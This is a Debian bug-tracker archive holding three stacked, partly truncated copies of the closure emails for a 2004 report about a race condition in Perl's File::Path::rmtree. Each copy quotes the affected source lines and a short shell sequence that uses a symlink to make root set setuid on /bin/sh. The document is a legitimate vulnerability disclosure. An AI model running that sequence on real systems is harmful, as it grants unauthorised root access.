Bug#286905: marked as done (perl-modules: File::Path::rmtree makes setuid)
Your message dated Fri, 09 Jan 2009 01:52:21 +
with message-id e1ll6xt-0006a4...@ries.debian.org
and subject line Bug#286905: fixed in perl 5.8.8-7etch5
has caused the Debian Bug report #286905,
regarding perl-modules: File::Path::rmtree makes setuid
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
286905: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=286905
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole
Noting USN-44-1 e.g. in
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html
I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:
170 (undef, undef, my $rp) = lstat $root or next;
171 $rp = 0; # don't forget setuid, setgid, sticky bits
172 if ( -d _ ) {
...
209 if (rmdir $root) {
210 ++$count;
211 }
212 else {
213 carp Can't remove directory $root: $!;
214 chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) :
$root))
215 or carp(and can't restore permissions to
216 . sprintf(0%o,$rp) . \n);
217 }
218 }
...
Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:
mkdir -p /tmp/psz/sh
perl -e 'open F, /tmp/psz/sh/$_ foreach (1..1000)'
chmod 4777 /tmp/psz/sh
While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:
mv /tmp/psz/sh /tmp/psz/dummy
ln -s /bin/sh /tmp/psz/sh
Root would have recorded the permissions of /tmp/psz/sh, but would
restore it to /bin/sh.
I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.
(A few minutes ago I emailed the File::Path authors tim.bu...@ig.co.uk
and bai...@newman.upenn.edu; Tim.Bunce bounced.)
Cheers,
Paul Szabo - p...@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23
13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C
Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction
---End Message---
---BeginMessage---
Source: perl
Source-Version: 5.8.8-7etch5
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive:
libcgi-fast-perl_5.8.8-7etch5_all.deb
to pool/main/p/perl/libcgi-fast-perl_5.8.8-7etch5_all.deb
libperl-dev_5.8.8-7etch5_i386.deb
to pool/main/p/perl/libperl-dev_5.8.8-7etch5_i386.deb
libperl5.8_5.8.8-7etch5_i386.deb
to pool/main/p/perl/libperl5.8_5.8.8-7etch5_i386.deb
perl-base_5.8.8-7etch5_i386.deb
to pool/main/p/perl/perl-base_5.8.8-7etch5_i386.deb
perl-debug_5.8.8-7etch5_i386.deb
to pool/main/p/perl/perl-debug_5.8.8-7etch5_i386.deb
perl-doc_5.8.8-7etch5_all.deb
to pool/main/p/perl/perl-doc_5.8.8-7etch5_all.deb
perl-modules_5.8.8-7etch5_all.deb
to pool/main/p/perl/perl-modules_5.8.8-7etch5_all.deb
perl-suid_5.8.8-7etch5_i386.deb
to pool/main/p/perl/perl-suid_5.8.8-7etch5_i386.deb
perl_5.8.8-7etch5.diff.gz
to pool/main/p/perl/perl_5.8.8-7etch5.diff.gz
perl_5.8.8-7etch5.dsc
to pool/main/p/perl/perl_5.8.8-7etch5.dsc
perl_5.8.8-7etch5_i386.deb
to pool/main/p/perl/perl_5.8.8-7etch5_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 286...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Niko Tyni nt...@debian.org (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Format: 1.7
Date: Thu, 20 Nov
Bug#286905: marked as done (perl-modules: File::Path::rmtree makes setuid)
Your message dated Thu, 27 Nov 2008 21:18:05 +
with message-id [EMAIL PROTECTED]
and subject line Bug#286905: fixed in perl 5.10.0-18
has caused the Debian Bug report #286905,
regarding perl-modules: File::Path::rmtree makes setuid
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
286905: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=286905
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole
Noting USN-44-1 e.g. in
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html
I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:
170 (undef, undef, my $rp) = lstat $root or next;
171 $rp = 0; # don't forget setuid, setgid, sticky bits
172 if ( -d _ ) {
...
209 if (rmdir $root) {
210 ++$count;
211 }
212 else {
213 carp Can't remove directory $root: $!;
214 chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) :
$root))
215 or carp(and can't restore permissions to
216 . sprintf(0%o,$rp) . \n);
217 }
218 }
...
Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:
mkdir -p /tmp/psz/sh
perl -e 'open F, /tmp/psz/sh/$_ foreach (1..1000)'
chmod 4777 /tmp/psz/sh
While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:
mv /tmp/psz/sh /tmp/psz/dummy
ln -s /bin/sh /tmp/psz/sh
Root would have recorded the permissions of /tmp/psz/sh, but would
restore it to /bin/sh.
I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.
(A few minutes ago I emailed the File::Path authors [EMAIL PROTECTED]
and [EMAIL PROTECTED]; Tim.Bunce bounced.)
Cheers,
Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23
13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C
Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction
---End Message---
---BeginMessage---
Source: perl
Source-Version: 5.10.0-18
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive:
libcgi-fast-perl_5.10.0-18_all.deb
to pool/main/p/perl/libcgi-fast-perl_5.10.0-18_all.deb
libperl-dev_5.10.0-18_i386.deb
to pool/main/p/perl/libperl-dev_5.10.0-18_i386.deb
libperl5.10_5.10.0-18_i386.deb
to pool/main/p/perl/libperl5.10_5.10.0-18_i386.deb
perl-base_5.10.0-18_i386.deb
to pool/main/p/perl/perl-base_5.10.0-18_i386.deb
perl-debug_5.10.0-18_i386.deb
to pool/main/p/perl/perl-debug_5.10.0-18_i386.deb
perl-doc_5.10.0-18_all.deb
to pool/main/p/perl/perl-doc_5.10.0-18_all.deb
perl-modules_5.10.0-18_all.deb
to pool/main/p/perl/perl-modules_5.10.0-18_all.deb
perl-suid_5.10.0-18_i386.deb
to pool/main/p/perl/perl-suid_5.10.0-18_i386.deb
perl_5.10.0-18.diff.gz
to pool/main/p/perl/perl_5.10.0-18.diff.gz
perl_5.10.0-18.dsc
to pool/main/p/perl/perl_5.10.0-18.dsc
perl_5.10.0-18_i386.deb
to pool/main/p/perl/perl_5.10.0-18_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Niko Tyni [EMAIL PROTECTED] (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Format: 1.8
Date: Fri, 21 Nov 2008 00:49:57 +0200
Source: perl
Binary: perl-base libcgi-fast-perl perl-doc perl-modules perl-debug perl-suid
Bug#286905: marked as done (perl-modules: File::Path::rmtree makes setuid)
Your message dated Mon, 07 Mar 2005 01:47:15 -0500
with message-id [EMAIL PROTECTED]
and subject line Bug#286905: fixed in perl 5.8.4-7
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--
Received: (at submit) by bugs.debian.org; 22 Dec 2004 22:11:05 +
From [EMAIL PROTECTED] Wed Dec 22 14:11:05 2004
Return-path: [EMAIL PROTECTED]
Received: from talus.maths.usyd.edu.au [129.78.68.1]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1ChEhE-00048l-00; Wed, 22 Dec 2004 14:11:04 -0800
Received: from pisa.maths.usyd.edu.au ([EMAIL PROTECTED]) [129.78.69.136]
by siv.maths.usyd.edu.au via smtpdoor V18.4
id 309156 for [EMAIL PROTECTED]; Thu, 23 Dec 2004 09:10:31 +1100
Message-Id: [EMAIL PROTECTED]
Received: from [EMAIL PROTECTED] by pisa.maths.usyd.edu.au (8.12.3/8.1/Submit)
id iBMMAV7n010381; Thu, 23 Dec 2004 09:10:31 +1100
From: Paul Szabo [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: perl-modules: File::Path::rmtree makes setuid
X-Mailer: reportbug 1.50
Date: Thu, 23 Dec 2004 09:10:31 +1100
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-5.9 required=4.0 tests=BAYES_00,HAS_PACKAGE,
MSGID_FROM_MTA_HEADER,WEIRD_PORT autolearn=no
version=2.60-bugs.debian.org_2004_03_25
X-Spam-Level:
Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole
Noting USN-44-1 e.g. in
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html
I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:
170 (undef, undef, my $rp) = lstat $root or next;
171 $rp = 0; # don't forget setuid, setgid, sticky bits
172 if ( -d _ ) {
...
209 if (rmdir $root) {
210 ++$count;
211 }
212 else {
213 carp Can't remove directory $root: $!;
214 chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) :
$root))
215 or carp(and can't restore permissions to
216 . sprintf(0%o,$rp) . \n);
217 }
218 }
...
Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:
mkdir -p /tmp/psz/sh
perl -e 'open F, /tmp/psz/sh/$_ foreach (1..1000)'
chmod 4777 /tmp/psz/sh
While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:
mv /tmp/psz/sh /tmp/psz/dummy
ln -s /bin/sh /tmp/psz/sh
Root would have recorded the permissions of /tmp/psz/sh, but would
restore it to /bin/sh.
I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.
(A few minutes ago I emailed the File::Path authors [EMAIL PROTECTED]
and [EMAIL PROTECTED]; Tim.Bunce bounced.)
Cheers,
Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23
13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C
Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction
---
Received: (at 286905-close) by bugs.debian.org; 7 Mar 2005 06:53:04 +
From [EMAIL PROTECTED] Sun Mar 06 22:53:04 2005
Return-path: [EMAIL PROTECTED]
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1D8C6y-XC-00; Sun, 06 Mar 2005 22:53:04 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1D8C1L-0001OJ-00; Mon, 07 Mar 2005 01:47:15 -0500
From: Brendan O'Dea [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#286905: fixed in perl 5.8.4-7
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date:
